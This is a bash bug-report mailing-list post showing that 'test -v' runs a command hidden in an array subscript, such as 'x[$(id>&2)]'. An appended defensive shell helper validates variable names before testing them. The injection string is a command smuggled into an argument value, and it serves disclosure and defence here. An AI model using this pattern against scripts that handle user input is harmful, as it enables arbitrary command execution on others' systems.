bug-bash

Arbitrary command execution from test on a quoted string


From: elettrino
Subject: Arbitrary command execution from test on a quoted string
Date: Thu, 28 Oct 2021 20:33:22 +0000

The following shows an example of bash testing a quoted string and as a result 
executing a command embedded in the string.

Here I used the command "id" to stand as an example of a command. The output of 
id on this machine was as follows:

user@machine:~$ id
uid=1519(user) gid=1519(user) groups=1519(user),100(users)
user@machine:~$

So to demonstrate:

user@machine:~$ USER_INPUT='x[$(id>&2)]'
user@machine:~$ test -v "$USER_INPUT"
uid=1519(user) gid=1519(user) groups=1519(user),100(users)
user@machine:~$

This means that if variable USER_INPUT was indeed input from a user, the user 
could execute an arbitrary command.

Also unexpected (and presumably related), bash is expanding the construct 
inside single quote marks:

user@machine:~$ test -v 'x[$(id>&2)]'
uid=1519(user) gid=1519(user) groups=1519(user),100(users)
user@machine:~$

user@machine:~$ echo $BASH_VERSION
4.4.20(1)-release
user@machine:~$

I don't know whether this happens with anything other than the -v option with 
test; I have not seen it happen under any other circumstance.

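
Added example, not part of the original message and not bash project code: test -v treats its operand as a variable name, and an array subscript in that name is evaluated, so a string such as the one in the report has to be validated before it reaches test -v. The helper names is_plain_name and var_is_set and the sample inputs are assumptions made for this sketch; it accepts only bare identifiers and rejects anything containing a subscript.

```bash
#!/usr/bin/env bash
# Added example: treat the operand of `test -v` as code, not data.
# is_plain_name and var_is_set are hypothetical helper names.

# Succeeds only for a bare identifier: rejects '', '[', '$', spaces, etc.
is_plain_name() (
    LC_ALL=C    # keep the bracket ranges ASCII-only
    case $1 in
        '' | [!A-Za-z_]* | *[!A-Za-z0-9_]*) exit 1 ;;
    esac
    exit 0
)

# Returns 0 if the named variable is set, 1 if it is unset,
# and 2 if the name was rejected and never evaluated.
var_is_set() {
    is_plain_name "$1" || return 2
    if [ -n "${BASH_VERSION:-}" ]; then
        test -v "$1"                      # safe: operand is a bare name
    else
        eval "[ -n \"\${$1+set}\" ]"      # portable fallback, same guard
    fi
}

# Constructed sample inputs; the third is the string from the report.
for candidate in HOME EXAMPLE_UNSET_NAME 'x[$(id>&2)]'; do
    rc=0
    var_is_set "$candidate" || rc=$?
    printf '%-22s -> %d\n' "$candidate" "$rc"
done
```

With the guard in place the reported string returns 2 and the embedded command is never run.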